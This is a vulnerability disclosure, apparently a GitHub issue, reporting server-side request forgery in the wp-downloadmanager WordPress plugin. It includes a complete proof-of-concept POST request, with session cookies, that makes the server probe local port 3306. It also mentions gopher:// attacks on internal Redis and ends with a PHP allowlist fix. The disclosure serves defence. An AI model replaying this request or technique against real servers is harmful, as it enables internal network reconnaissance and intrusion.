SSRF vulnerability in download-add.php
nenf opened this issue · 0 comments
Hi, support team!
There is an SSRF vulnerability in the plugin. Any user can exploit it, for example to identify open local ports.
- Vulnerable action: wp-downloadmanager/download-add.php
- Vulnerable parameter: file_remote
For example, a hacker can set the value http://127.0.0.1:3306 in the file_remote parameter and learn the status of port 3306. If the port is open, the server will wait for an answer from the service on 3306; otherwise the server returns an answer instantly.
POC:
POST /wp-admin/admin.php?page=wp-downloadmanager/download-add.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:86.1) Gecko/20100101 Firefox/86.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/wp-admin/admin.php?page=wp-downloadmanager%2Fdownload-add.php
Content-Type: multipart/form-data; boundary=---------------------------393575653922464158771860946663
Content-Length: 2619
Origin: http://127.0.0.1:8000
Connection: close
Cookie: wordpress_4411def9d576984c8d78253236b2a62f=test%7C1595422269%7CjLVc1fVTQN34gtfpV8rqQrsXl17ygiTd8Q9pYOhaMWO%7C9bcfc3624c68ed4a056e468f17f2eefffb6da09f89b04b5b0c3d3d4db5537090; pma_lang=ru; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1595165328; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=test%7C1595422269%7CjLVc1fVTQN34gtfpV8rqQrsXl17ygiTd8Q9pYOhaMWO%7Cb271733df202a3ca343f4cedcce5efb9c2351595f6136016e234e9de20eed961
Upgrade-Insecure-Requests: 1
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="MAX_FILE_SIZE"
31457280
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="_wpnonce"
3982de2ab5
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/admin.php?page=wp-downloadmanager/download-add.php
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file"
/test.txt
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_type"
2
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_remote"
http://127.0.0.1:3306
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_name"
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_des"
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_cat"
0
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_size"
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_day"
20
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_month"
7
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_year"
2020
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_hour"
13
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_minute"
9
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_second"
28
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_hits"
0
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_permission"
-1
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="do"
Add File
-----------------------------393575653922464158771860946663--
I was listening on port 3306 on the backend (127.0.0.1), and got a request from the 127.0.0.1 server:
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 45588
GET / HTTP/1.0
Host: 127.0.0.1:3306
Connection: close
Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports and local network hosts, and execute commands on services (for example Redis, by using the gopher:// scheme).
To prevent this vulnerability, use the following guide: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
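A server-side allowlist check that the plugin could run on the file_remote value before fetching it, written as an added example in PHP. This is not the plugin's own code; the hypothetical fetch function it would precede and the sample URLs are assumptions, and the check applies the scheme, port and private-address rules from the OWASP cheat sheet linked above.

```php
<?php
// Added example (not wp-downloadmanager code): reject remote URLs that would
// make the WordPress server talk to loopback/private hosts or non-web ports.

function is_forbidden_ip(string $ip): bool {
    // FILTER_FLAG_NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16, fc00::/7;
    // FILTER_FLAG_NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, ...
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

// Returns [bool allowed, string reason]; run this before any fetch of $url.
function validate_remote_url(string $url): array {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return [false, 'unparseable URL or missing host'];
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return [false, "scheme '$scheme' not allowed"]; // blocks gopher://, file://, ...
    }
    // Only well-known web ports: this alone stops the 3306 probe from the report.
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return [false, "port $port not allowed"];
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return [false, 'credentials in URL not allowed'];
    }
    $host = trim($parts['host'], '[]'); // strip IPv6 brackets
    // Resolve hostnames here so every returned address is inspected, not just the first.
    $addrs = filter_var($host, FILTER_VALIDATE_IP) !== false ? [$host] : gethostbynamel($host);
    if ($addrs === false || $addrs === []) {
        return [false, "cannot resolve $host"];
    }
    foreach ($addrs as $ip) {
        if (is_forbidden_ip($ip)) {
            return [false, "$host resolves to non-public address $ip"];
        }
    }
    return [true, 'ok'];
}

// Constructed sample inputs: the value from the report, a gopher URL, and a public host.
foreach (['http://127.0.0.1:3306', 'gopher://127.0.0.1:6379/', 'https://example.com/a.zip'] as $u) {
    [$ok, $why] = validate_remote_url($u);
    printf("%-30s %s (%s)\n", $u, $ok ? 'ALLOW' : 'DENY', $why);
}
```

The fetch that follows must not follow redirects blindly (re-run the check on every redirect target) and should pin the connection to the validated address (for example curl's CURLOPT_RESOLVE), otherwise a DNS answer that changes between check and fetch bypasses the allowlist.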